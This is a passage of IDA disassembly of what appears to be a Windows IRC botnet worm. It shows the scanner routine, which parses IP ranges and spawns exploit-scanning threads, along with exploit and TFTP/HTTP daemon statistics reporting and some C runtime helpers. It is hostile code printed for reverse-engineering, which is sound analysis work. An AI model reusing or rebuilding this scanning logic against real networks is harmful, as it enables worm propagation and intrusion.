		test	cl, cl
		jnz	short loc_40236F

loc_402389:				; CODE XREF: sub_4022D6+A1j
		xor	eax, eax
		jmp	short loc_402391
; ---------------------------------------------------------------------------

loc_40238D:				; CODE XREF: sub_4022D6+9Dj
					; sub_4022D6+A9j
		sbb	eax, eax
		sbb	eax, edi

loc_402391:				; CODE XREF: sub_4022D6+B5j
		test	eax, eax
		jz	short loc_4023B6
		inc	dword ptr [ebp-54h]
		mov	ecx, [ebp-54h]
		imul	ecx, 2Ch
		lea	ecx, dword_424528[ecx]
		mov	eax, ecx
		lea	esi, [eax+1]

loc_4023A9:				; CODE XREF: sub_4022D6+D8j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4023A9

loc_4023B0:				; CODE XREF: sub_4022D6+92j
		sub	eax, esi
		jnz	short loc_40236A
		jmp	short loc_4023BB
; ---------------------------------------------------------------------------

loc_4023B6:				; CODE XREF: sub_4022D6+BDj
		cmp	[ebp-54h], edi
		jnz	short loc_4023D8

loc_4023BB:				; CODE XREF: sub_4022D6+DEj
		push	offset aScanUnknownExp ; "Scan:	Unknown	Exploit."
		push	dword ptr [ebp-68h] ; DATA XREF: sub_4910D7+1E4w
		push	dword ptr [ebp+0Ch]
		push	offset dword_427FFC ; DATA XREF: sub_4910D7+1F3w
		call	sub_417B51
		add	esp, 10h
		jmp	loc_4027EC	; DATA XREF: sub_4910D7+204w
; ---------------------------------------------------------------------------

loc_4023D8:				; CODE XREF: sub_4022D6+E3j
		mov	esi, [ebx+8]
		mov	eax, esi
		mov	ecx, offset a____0 ; "*.*.*.*"
		call	sub_419834
		test	eax, eax
		jz	short loc_4023FD
		push	dword ptr [ebx+0Ch]
		mov	byte ptr [ebp-41h], 1
		call	sub_40416B
		pop	ecx
		mov	[ebp-4Ch], eax
		jmp	short loc_40245A
; ---------------------------------------------------------------------------

loc_4023FD:				; CODE XREF: sub_4022D6+113j
		push	esi
		call	sub_40416B
		pop	ecx
		push	3
		pop	edx

loc_402407:				; DATA XREF: zbox2z3f:004910A4w
					; sub_4910D7:loc_491104r ...
		cmp	[ebp+1Ch], edx
		mov	[ebp-4Ch], eax	; DATA XREF: zbox2z3f:004910BFw
					; sub_49112A+11r
		mov	[ebp-48h], edx	; DATA XREF: sub_4910D7+3w
					; sub_4910D7+13r
		jl	short loc_402453
		mov	eax, edx	; DATA XREF: sub_4910D7+9Bw
					; sub_49148C+3r

loc_402414:				; CODE XREF: sub_4022D6+17Bj
		mov	ecx, [ebp-50h]
		mov	eax, [ecx+eax*4]
		mov	edi, eax	; DATA XREF: sub_4910D7+D2w
		mov	esi, offset aA	; "-a"
		mov	ecx, edx

loc_402423:				; DATA XREF: sub_4910D7+A9r
		xor	ebx, ebx
		repe cmpsb

loc_402427:				; DATA XREF: zbox2z3f:004919F3r
		jz	short loc_4024A1
		mov	edi, eax

loc_40242B:				; DATA XREF: sub_4910D7+222r
		mov	esi, 420D7Ch
		mov	ecx, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_402453
		mov	edi, eax
		mov	esi, offset aC	; DATA XREF: sub_4910D7:loc_491271r
					; "-c"
		mov	ecx, edx
		xor	eax, eax
		repe cmpsb
		jz	short loc_4024A7
		inc	dword ptr [ebp-48h]
		movzx	eax, word ptr [ebp-48h]
		cmp	eax, [ebp+1Ch]
		jle	short loc_402414

loc_402453:				; CODE XREF: sub_4022D6+13Aj
					; sub_4022D6+160j
		mov	dword ptr [ebp-48h], 1

loc_40245A:				; CODE XREF: sub_4022D6+125j
					; sub_4022D6+1CFj ...
		xor	eax, eax

loc_40245C:				; CODE XREF: sub_4022D6+19Cj
		cmp	byte_428349[eax], 0
		jz	short loc_402468
		inc	dword ptr [ebp-58h]

loc_402468:				; CODE XREF: sub_4022D6+18Dj
		add	eax, 124h
		cmp	eax, 0CD50h
		jbe	short loc_40245C
		mov	ecx, [ebp-58h]
		mov	eax, 0B4h
		sub	eax, ecx
		cmp	eax, [ebp-4Ch]
		jnb	short loc_4024B0

loc_402483:				; DATA XREF: sub_491261+7r
					; zbox2z3f:00491B51r
		push	eax
		push	offset aScanNotEnoughT ; "Scan:	Not Enough Threads. %d Available."...
		push	dword ptr [ebp-68h] ; DATA XREF: sub_4910D7+DFr
		push	dword ptr [ebp+0Ch]

loc_40248F:				; DATA XREF: zbox2z3f:00491A23r
					; sub_4910D7+1C0r
		push	offset dword_427FFC
		call	sub_417B51	; DATA XREF: sub_4910D7+1DBr
		add	esp, 14h	; DATA XREF: sub_4910D7+1EAr
		jmp	loc_4027EC	; DATA XREF: sub_4910D7+1F9r
; ---------------------------------------------------------------------------

loc_4024A1:				; CODE XREF: sub_4022D6:loc_402427j
					; DATA XREF: sub_4910D7+24Ar
		and	dword ptr [ebp-48h], 0
		jmp	short loc_40245A
; ---------------------------------------------------------------------------

loc_4024A7:				; CODE XREF: sub_4022D6+16Fj
		mov	dword ptr [ebp-48h], 2
		jmp	short loc_40245A
; ---------------------------------------------------------------------------

loc_4024B0:				; CODE XREF: sub_4022D6+1ABj
		add	[ebp-4Ch], ecx

loc_4024B3:				; DATA XREF: sub_4910D7+1CEr
		cmp	byte ptr [ebp-41h], 0
		jz	loc_4025D7
		mov	eax, [ebp-50h]
		push	dword ptr [eax+8]
		lea	eax, [ebp-30h]
		push	offset dword_420B28

loc_4024CB:				; DATA XREF: zbox2z3f:00491AC6r
					; zbox2z3f:00491AE4r
		push	0Fh
		pop	ebx
		push	ebx
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-30h]
		add	esp, 10h

loc_4024DB:				; DATA XREF: zbox2z3f:00491B6Do
		lea	ecx, [eax+1]

loc_4024DE:				; CODE XREF: sub_4022D6:loc_4024E3j
		mov	dl, [eax]
		inc	eax
		test	dl, dl

loc_4024E3:				; DATA XREF: zbox2z3f:00491A0Dr
		jnz	short loc_4024DE
		sub	eax, ecx
		mov	[ebp+eax-30h], dl
		lea	eax, [ebp-6Ch]
		push	eax
		lea	eax, [ebp-64h]
		push	eax
		lea	eax, [ebp-60h]
		push	eax
		lea	eax, [ebp-5Ch]
		push	eax

loc_4024FB:				; DATA XREF: zbox2z3f:00491C72r
		lea	eax, [ebp-30h]
		push	offset aD_D_D_D	; "%d.%d.%d.%d"
		push	eax
		call	sub_4039A4
		add	esp, 18h
		cmp	dword ptr [ebp-5Ch], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_402526
		push	offset aX_	; "x."
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 0Ch
		jmp	short loc_402538
; ---------------------------------------------------------------------------

loc_402526:				; CODE XREF: sub_4022D6+23Dj
		push	dword ptr [ebp-5Ch]
		push	offset aD_	; "%d."
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 10h

loc_402538:				; CODE XREF: sub_4022D6+24Ej
		cmp	dword ptr [ebp-60h], 0FFFFFFFFh
		mov	esi, offset aSD_ ; "%s%d."
		mov	edi, offset aSx_ ; "%sx."
		lea	eax, [ebp-20h]
		jnz	short loc_402559
		push	eax
		push	edi
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 10h
		jmp	short loc_40256B
; ---------------------------------------------------------------------------

loc_402559:				; CODE XREF: sub_4022D6+273j
		push	dword ptr [ebp-60h]
		push	eax
		push	esi
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 14h

loc_40256B:				; CODE XREF: sub_4022D6+281j
		cmp	dword ptr [ebp-64h], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_402582
		push	eax
		push	edi
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 10h
		jmp	short loc_402594
; ---------------------------------------------------------------------------

loc_402582:				; CODE XREF: sub_4022D6+29Cj
		push	dword ptr [ebp-64h]
		push	eax
		push	esi
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 14h

loc_402594:				; CODE XREF: sub_4022D6+2AAj
		cmp	dword ptr [ebp-6Ch], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_4025AF
		push	eax
		push	offset aSx	; "%sx"
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 10h
		jmp	short loc_4025C5
; ---------------------------------------------------------------------------

loc_4025AF:				; CODE XREF: sub_4022D6+2C5j
		push	dword ptr [ebp-6Ch]
		push	eax
		push	offset aSD	; "%s%d"
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_402EAE
		add	esp, 14h

loc_4025C5:				; CODE XREF: sub_4022D6+2D7j
		lea	eax, [ebp-20h]
		lea	edx, [eax+1]

loc_4025CB:				; CODE XREF: sub_4022D6+2FAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4025CB
		jmp	loc_4026B0
; ---------------------------------------------------------------------------

loc_4025D7:				; CODE XREF: sub_4022D6+1E1j
		push	dword_427FFC
		mov	byte ptr [ebp-40h], 0
		xor	eax, eax
		lea	edi, [ebp-3Fh]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp-40h]
		stosb
		call	sub_4197B6
		xor	eax, eax
		lea	edi, [ebp-30h]
		stosd
		stosd
		stosd
		stosd
		mov	eax, esi
		push	eax
		push	offset dword_420B28
		push	0Fh
		pop	esi
		lea	eax, [ebp-30h]
		push	esi
		push	eax
		call	sub_402EAE
		lea	eax, [ebp-30h]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_40261B:				; CODE XREF: sub_4022D6+34Aj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40261B
		sub	eax, ecx
		mov	[ebp+eax-30h], dl
		lea	eax, [ebp-6Ch]
		push	eax
		lea	eax, [ebp-64h]
		push	eax
		lea	eax, [ebp-60h]
		push	eax
		lea	eax, [ebp-5Ch]
		push	eax
		lea	eax, [ebp-30h]
		push	offset aD_D_D_D	; "%d.%d.%d.%d"
		push	eax
		call	sub_4039A4
		mov	eax, [ebp-48h]
		add	esp, 18h
		sub	eax, 0
		jz	short loc_40268E
		dec	eax
		jz	short loc_402674
		dec	eax
		jnz	short loc_4026A3
		push	dword ptr [ebp-64h]
		lea	eax, [ebp-20h]
		push	dword ptr [ebp-60h]
		push	dword ptr [ebp-5Ch]
		push	offset aD_D_D_x	; "%d.%d.%d.x"
		push	esi
		push	eax
		call	sub_402EAE
		add	esp, 18h
		jmp	short loc_4026A3
; ---------------------------------------------------------------------------

loc_402674:				; CODE XREF: sub_4022D6+37Cj
		push	dword ptr [ebp-60h]
		lea	eax, [ebp-20h]
		push	dword ptr [ebp-5Ch]
		push	offset aD_D_x_x	; "%d.%d.x.x"
		push	esi
		push	eax
		call	sub_402EAE
		add	esp, 14h
		jmp	short loc_4026A3
; ---------------------------------------------------------------------------

loc_40268E:				; CODE XREF: sub_4022D6+379j
		push	dword ptr [ebp-5Ch]
		lea	eax, [ebp-20h]
		push	offset aD_x_x_x	; "%d.x.x.x"
		push	esi
		push	eax
		call	sub_402EAE
		add	esp, 10h

loc_4026A3:				; CODE XREF: sub_4022D6+37Fj
					; sub_4022D6+39Cj ...
		lea	eax, [ebp-20h]
		lea	edx, [eax+1]

loc_4026A9:				; CODE XREF: sub_4022D6+3D8j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4026A9

loc_4026B0:				; CODE XREF: sub_4022D6+2FCj
		sub	eax, edx
		cmp	byte ptr [ebp-41h], 0
		mov	byte ptr [ebp+eax-20h],	0
		mov	eax, [ebp-50h]
		jz	short loc_4026C5
		push	dword ptr [eax+0Ch]
		jmp	short loc_4026C8
; ---------------------------------------------------------------------------

loc_4026C5:				; CODE XREF: sub_4022D6+3E8j
		push	dword ptr [eax+8]

loc_4026C8:				; CODE XREF: sub_4022D6+3EDj
		call	sub_40416B
		push	eax
		mov	eax, [ebp-54h]
		imul	eax, 2Ch
		push	dword_424548[eax]
		lea	eax, [ebp-20h]
		push	eax
		push	offset aScanSDUsingDTh ; "Scan:	%s:%d Using %d Threads."
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 20h
		call	sub_419AEB
		mov	ecx, [ebp-4Ch]
		cmp	[ebp-58h], ecx
		jnb	loc_4027EC
		mov	eax, [ebp-58h]
		imul	eax, 124h
		sub	ecx, [ebp-58h]
		mov	[ebp-50h], eax
		mov	[ebp-4Ch], ecx
		mov	esi, eax

loc_40271B:				; CODE XREF: sub_4022D6+510j
		push	124h
		lea	ebx, dword_428338[esi]
		lea	edi, [ebx-100h]
		push	0
		push	edi
		call	sub_407F20
		lea	eax, [ebp-30h]
		push	eax
		push	offset dword_420B28
		push	0Fh
		push	ebx
		call	sub_402EAE
		mov	eax, ebx
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_40274D:				; CODE XREF: sub_4022D6+47Cj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40274D
		push	dword ptr [ebp-68h]
		sub	eax, ecx
		mov	byte ptr dword_428338[esi+eax],	dl
		mov	al, [ebp-41h]
		push	offset dword_420B28
		mov	[ebx+12h], al
		mov	eax, [ebp-48h]
		push	0FFh
		push	edi
		mov	[ebx+18h], eax
		call	sub_402EAE
		mov	eax, edi
		add	esp, 10h
		lea	ecx, [eax+1]

loc_402784:				; CODE XREF: sub_4022D6+4B3j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402784
		sub	eax, ecx
		mov	byte_428238[esi+eax], dl
		mov	al, [ebp+0Ch]
		mov	[ebx+10h], al
		mov	eax, [ebp-54h]
		push	8
		mov	byte ptr [ebx+11h], 1
		mov	[ebx+14h], eax
		call	sub_40340B
		pop	ecx
		mov	[ebp-58h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_4027CF
		mov	ecx, edi
		push	offset sub_413DDD
		mov	edi, offset aScanner ; "Scanner"
		mov	esi, eax
		call	sub_414884
		mov	esi, [ebp-50h]
		jmp	short loc_4027D1
; ---------------------------------------------------------------------------

loc_4027CF:				; CODE XREF: sub_4022D6+4DFj
		xor	eax, eax

loc_4027D1:				; CODE XREF: sub_4022D6+4F7j
		or	dword ptr [ebp-4], 0FFFFFFFFh
		mov	eax, [eax]
		add	esi, 124h
		dec	dword ptr [ebp-4Ch]
		mov	[ebx+20h], eax
		mov	[ebp-50h], esi
		jnz	loc_40271B

loc_4027EC:				; CODE XREF: sub_4022D6+61j
					; sub_4022D6+77j ...
		call	sub_404A2F
		retn	1Ch
sub_4022D6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4027F4	proc near		; DATA XREF: _1fieagrn:off_420EACo

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 1Ch
		and	[esp+1Ch+var_1C], 0
		push	ebx
		push	esi
		mov	ebx, offset dword_435298
		push	edi
		mov	[esp+28h+var_10], ebx

loc_40280D:				; CODE XREF: sub_4027F4+83j
					; sub_4027F4+A0j ...
		mov	eax, dword_43529C
		mov	eax, [eax]
		mov	[esp+28h+var_14], eax
		mov	[esp+28h+var_18], ebx

loc_40281C:				; CODE XREF: sub_4027F4+67j
		mov	eax, dword_43529C
		lea	edi, [esp+28h+var_10]
		lea	esi, [esp+28h+var_18]
		mov	[esp+28h+var_C], eax
		call	sub_40166F
		test	al, al
		jz	short loc_4028AF
		mov	edi, offset aScanner ; "Scanner"
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	8
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [esp+28h+var_18]
		jz	short loc_40285D
		lea	edi, [esp+28h+var_8]
		call	sub_40168C
		jmp	short loc_40281C
; ---------------------------------------------------------------------------

loc_40285D:				; CODE XREF: sub_4027F4+5Cj
		call	sub_40164F
		mov	edi, [eax+40h]
		lea	esi, [esp+28h+var_18]
		call	sub_40164F
		mov	eax, [eax]
		call	sub_4147FC
		test	al, al
		jz	short loc_40280D
		xor	eax, eax
		xor	ecx, ecx

loc_40287D:				; CODE XREF: sub_4027F4+9Ej
		cmp	dword_428358[ecx], edi
		jz	short loc_402899
		add	ecx, 124h
		inc	eax
		cmp	ecx, 0CD50h
		jbe	short loc_40287D
		jmp	loc_40280D
; ---------------------------------------------------------------------------

loc_402899:				; CODE XREF: sub_4027F4+8Fj
		inc	[esp+28h+var_1C]
		imul	eax, 124h
		mov	byte_428349[eax], 0
		jmp	loc_40280D
; ---------------------------------------------------------------------------

loc_4028AF:				; CODE XREF: sub_4027F4+40j
		push	[esp+28h+var_1C]
		push	offset aScanAllScanThr ; "Scan:	All Scan Threads Stopped. %d kill"...
		push	[ebp+arg_10]
		push	[ebp+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		add	esp, 14h
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn	1Ch
sub_4027F4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=188h


sub_4028D4	proc near		; DATA XREF: _1fieagrn:off_420EB4o

var_208		= dword	ptr -208h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		lea	ebp, [esp-188h]
		sub	esp, 208h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+188h+var_4], eax
		mov	eax, [ebp+188h+arg_10]
		push	esi
		push	edi
		mov	esi, 1FFh
		push	esi
		mov	[ebp+188h+var_208], eax
		lea	eax, [ebp+188h+var_203]
		push	0
		push	eax
		mov	[ebp+188h+var_204], 0
		call	sub_407F20
		push	offset aStatisticsExpl ; "Statistics: Exploits:"
		lea	eax, [ebp+188h+var_204]
		push	esi
		push	eax
		xor	edi, edi
		call	sub_402EAE
		add	esp, 18h
		xor	eax, eax

loc_402925:				; CODE XREF: sub_4028D4+7Ej
		push	dword_42454C[eax]
		lea	eax, dword_424528[eax]
		push	eax
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSSD	; "%s %s: %d"
		push	esi
		push	eax
		call	sub_402EAE
		add	esp, 18h
		inc	edi
		mov	eax, edi
		imul	eax, 2Ch
		cmp	dword_424548[eax], 0
		jnz	short loc_402925
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSDaemons ; "%s;	Daemons:"
		push	esi
		push	eax
		call	sub_402EAE
		push	dword_434F94
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSTftpD	; "%s TFTP: %d"
		push	esi
		push	eax
		call	sub_402EAE
		push	dword_434F88
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSHttpD	; "%s HTTP: %d"
		push	esi
		push	eax
		call	sub_402EAE
		add	esp, 38h
		lea	eax, [ebp+188h+var_204]
		pop	edi
		lea	edx, [eax+1]
		pop	esi

loc_40299B:				; CODE XREF: sub_4028D4+CCj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40299B
		sub	eax, edx
		mov	[ebp+eax+188h+var_204],	cl
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset dword_420B28
		push	[ebp+188h+var_208]
		push	[ebp+188h+arg_4]
		push	offset dword_427FFC
		call	sub_417B51
		mov	ecx, [ebp+188h+var_4]
		xor	ecx, ebp
		add	esp, 14h
		call	sub_402AD0
		add	ebp, 188h
		leave
		retn	1Ch
sub_4028D4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4029DE	proc near		; CODE XREF: sub_41B751+A6p
		jmp	ds:dword_41D1D8
sub_4029DE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4029E4	proc near		; CODE XREF: sub_41B751+149p
		jmp	ds:dword_41D1D4
sub_4029E4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4029EA	proc near		; CODE XREF: sub_41B751+76p
					; sub_41B751+B9p ...
		jmp	ds:dword_41D1D0
sub_4029EA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4029F0	proc near		; CODE XREF: sub_41B751+C8p
					; sub_41B751+1C0p ...
		jmp	ds:dword_41D1CC
sub_4029F0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4029F6	proc near		; CODE XREF: sub_41B751+1B1p
		jmp	ds:dword_41D1C8
sub_4029F6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4029FC	proc near		; CODE XREF: sub_414337+88p
					; sub_414337+C5p
		jmp	ds:dword_41D260
sub_4029FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402A02	proc near		; CODE XREF: sub_41AFA7+B2p
		jmp	ds:dword_41D1C0
sub_402A02	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402A08	proc near		; CODE XREF: sub_401C1D+16p
					; sub_417776+24p ...
		jmp	sub_40340B
sub_402A08	endp


; =============== S U B	R O U T	I N E =======================================



sub_402A0D	proc near		; DATA XREF: _1fieagrn:004215B4o
		mov	dword ptr [ecx], offset	off_41D348
		jmp	sub_40109A
sub_402A0D	endp

; ---------------------------------------------------------------------------

loc_402A18:				; DATA XREF: _1fieagrn:off_41D348o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41D348
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_402A34
		push	esi
		call	sub_40332D
		pop	ecx

loc_402A34:				; CODE XREF: .text:00402A2Bj
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_402A3A	proc near		; CODE XREF: sub_401337+Dp
		push	44h
		mov	eax, offset loc_41C8A3
		call	sub_40497C
		push	offset aStringTooLong ;	"string	too long"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_421C98
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41D33C
		call	sub_40456B
		int	3		; Trap to Debugger
sub_402A3A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402A79	proc near		; CODE XREF: sub_401141+13p
					; sub_4012AC+Fp
		push	44h
		mov	eax, offset loc_41C8A3
		call	sub_40497C
		push	offset aInvalidStringP ; "invalid string position"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_4215B0
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41D348
		call	sub_40456B
		int	3		; Trap to Debugger
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_4013E6
		mov	dword ptr [esi], offset	off_41D348
		mov	eax, esi
		pop	esi
		retn	4
sub_402A79	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402AD0	proc near		; CODE XREF: sub_401DA7+9Ap
					; sub_401E4A+182p ...
		cmp	ecx, dword_423064
		jnz	short loc_402ADA
		rep retn
; ---------------------------------------------------------------------------

loc_402ADA:				; CODE XREF: sub_402AD0+6j
		jmp	sub_404A3E
sub_402AD0	endp


; =============== S U B	R O U T	I N E =======================================



sub_402ADF	proc near		; CODE XREF: sub_402B96+Dp
					; sub_402CB9+1Ap ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		push	esi
		mov	esi, ecx
		mov	byte ptr [esi+0Ch], 0
		jnz	short loc_402B51
		call	sub_40574D
		mov	[esi+8], eax
		mov	ecx, [eax+6Ch]
		mov	[esi], ecx
		mov	ecx, [eax+68h]
		mov	[esi+4], ecx
		mov	ecx, [esi]
		cmp	ecx, off_423678
		jz	short loc_402B1D
		mov	ecx, dword_423594
		test	[eax+70h], ecx
		jnz	short loc_402B1D
		call	sub_405461
		mov	[esi], eax

loc_402B1D:				; CODE XREF: sub_402ADF+2Aj
					; sub_402ADF+35j
		mov	eax, [esi+4]
		cmp	eax, dword_423498
		jz	short loc_402B3E
		mov	eax, [esi+8]
		mov	ecx, dword_423594
		test	[eax+70h], ecx
		jnz	short loc_402B3E
		call	sub_404D50
		mov	[esi+4], eax

loc_402B3E:				; CODE XREF: sub_402ADF+47j
					; sub_402ADF+55j
		mov	eax, [esi+8]
		test	byte ptr [eax+70h], 2
		jnz	short loc_402B5B
		or	dword ptr [eax+70h], 2
		mov	byte ptr [esi+0Ch], 1
		jmp	short loc_402B5B
; ---------------------------------------------------------------------------

loc_402B51:				; CODE XREF: sub_402ADF+Dj
		mov	ecx, [eax]
		mov	[esi], ecx
		mov	eax, [eax+4]
		mov	[esi+4], eax

loc_402B5B:				; CODE XREF: sub_402ADF+66j
					; sub_402ADF+70j
		mov	eax, esi
		pop	esi
		retn	4
sub_402ADF	endp


; =============== S U B	R O U T	I N E =======================================



sub_402B61	proc near		; CODE XREF: sub_402B96+86p
					; sub_402C69+39j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi

loc_402B6B:				; CODE XREF: sub_402B61+2Ej
		movzx	eax, byte ptr [esi]
		lea	ecx, [eax-41h]
		inc	esi
		cmp	ecx, 19h
		ja	short loc_402B7A
		add	eax, 20h

loc_402B7A:				; CODE XREF: sub_402B61+14j
		movzx	ecx, byte ptr [edx]
		lea	edi, [ecx-41h]
		inc	edx
		cmp	edi, 19h
		ja	short loc_402B89
		add	ecx, 20h

loc_402B89:				; CODE XREF: sub_402B61+23j
		test	eax, eax
		jz	short loc_402B91
		cmp	eax, ecx
		jz	short loc_402B6B

loc_402B91:				; CODE XREF: sub_402B61+2Aj
		pop	edi
		sub	eax, ecx
		pop	esi
		retn
sub_402B61	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402B96	proc near		; CODE XREF: sub_402C69+45p
					; sub_40EB4A+8Fp

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		xor	ebx, ebx
		cmp	[ebp+arg_0], ebx
		jnz	short loc_402BDD
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402BD3
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402BD3:				; CODE XREF: sub_402B96+34j
		mov	eax, 7FFFFFFFh
		jmp	loc_402C66
; ---------------------------------------------------------------------------

loc_402BDD:				; CODE XREF: sub_402B96+17j
		push	edi
		mov	edi, [ebp+arg_4]
		cmp	edi, ebx
		jnz	short loc_402C10
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_402C09
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_402C09:				; CODE XREF: sub_402B96+6Aj
		mov	eax, 7FFFFFFFh
		jmp	short loc_402C65
; ---------------------------------------------------------------------------

loc_402C10:				; CODE XREF: sub_402B96+4Dj
		mov	eax, [ebp+var_10]
		cmp	[eax+14h], ebx
		jnz	short loc_402C25
		push	edi
		push	[ebp+arg_0]
		call	sub_402B61
		pop	ecx
		pop	ecx
		jmp	short loc_402C59
; ---------------------------------------------------------------------------

loc_402C25:				; CODE XREF: sub_402B96+80j
		push	esi

loc_402C26:				; CODE XREF: sub_402B96+BCj
		mov	eax, [ebp+arg_0]
		movzx	eax, byte ptr [eax]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405A0A
		inc	[ebp+arg_0]
		mov	esi, eax
		movzx	eax, byte ptr [edi]
		lea	ecx, [ebp+var_10]
		push	ecx
		push	eax
		call	sub_405A0A
		add	esp, 10h
		inc	edi
		cmp	esi, ebx
		jz	short loc_402C54
		cmp	esi, eax
		jz	short loc_402C26

loc_402C54:				; CODE XREF: sub_402B96+B8j
		sub	esi, eax
		mov	eax, esi
		pop	esi

loc_402C59:				; CODE XREF: sub_402B96+8Dj
		cmp	[ebp+var_4], bl
		jz	short loc_402C65
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_402C65:				; CODE XREF: sub_402B96+78j
					; sub_402B96+C6j
		pop	edi

loc_402C66:				; CODE XREF: sub_402B96+42j
		pop	ebx
		leave
		retn
sub_402B96	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402C69	proc near		; CODE XREF: sub_417E66+34p
					; sub_417E66+45p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		xor	esi, esi
		cmp	dword_427420, esi
		jnz	short loc_402CA7
		cmp	[ebp+arg_0], esi
		jnz	short loc_402C9B

loc_402C7C:				; CODE XREF: sub_402C69+35j
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
